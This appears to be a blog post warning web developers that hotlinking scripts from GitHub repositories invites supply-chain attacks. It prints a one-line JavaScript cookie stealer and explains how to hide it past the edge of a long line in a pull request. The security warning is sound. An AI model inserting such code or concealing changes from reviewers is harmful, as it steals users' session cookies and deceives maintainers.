RSS Feed

Hotlinking to source code repositories is dangerous for the web



Billy Hoffman from Zoompf wrote a great post titled html5shiv and Serving Content From Code Repositories, which details why you should never ever hotlink to source code repositories, mostly performance-wise. You should definitely read it and then come back here so we'll talk about the security implications of that same sin.

The Open, Irresponsible Web

To put it straight: If you're linking to a JavaScipt file hosted on a source code repositories, you're putting your site and the web at risk.

Me, the so-called attacker, preparing an innocent-looking pull requestI know, you're already hotlinking to tons of third-party static files and snippets such as facebook & twitter, Google Analytics, maybe TypeKit or whatever. They're all large corporations, and if ga.js will ever get compromised, we'd all suffer.

But you and your favorite open-source maintainer are neither facebook nor google. I can get all spooky and convince you that hackers troll web-dev conferences and wait for an opportunity to quickly push malicous changesets from Paul, Remy or Lea's laptops; But that would be foolish. No one would risk an arrest when it's so much easier to abuse good will. 

Compromising Open Source Projects

Without any black-hat-base64-encoded-eval'd-stuff, let's see how easy it is to compromise any open source project. The idea is simple enough, and I'll focus on github to demonstrate it but I believe it could work with most platforms.

Anyone can fork github repositories, apply patches and send pull requests to project maintainers. On active open source projects like we have in our thriving web-dev community, this is part of the routine. So an attacker might write a malicous line like the following:

// Prepend with lots of spaces, preferably after a long line
var stealUrl = ''+encodeURIComponent(location) + encodeURIComponent(document.cookie); var steal = new Image(); steal.src = stealUrl; document.getElementsByTagName('body')[0].appendChild(steal);

Even if the target choose to review the changes, he probably won't suspect a thing...And shove it far after the visible end of a long line, which has some other innocent changes. Hidden among some innocuous tweaks and possibly commits, most maintainers won't suspect a thing. A major help is that the github preview of pull requests doesn't use word wrap, which is great for visualizing diffs but also problematic because it's quite easy for a long line like the above to go unnoticed.

Surprise! The tiny cookie-thief is peeking, after you thought the line has ended.Now, that risk exists even if you never hotlink to source code repositories - But if you do, your site is compromised within merely 180 seconds from the 'infection'. That's right - Your users' cookies and who knows whatever else could be stolen three minutes after a third-party project, completely out of your control, gets compromised. How's that for a "Zero Day Exploit"?

Related Content

What do you think?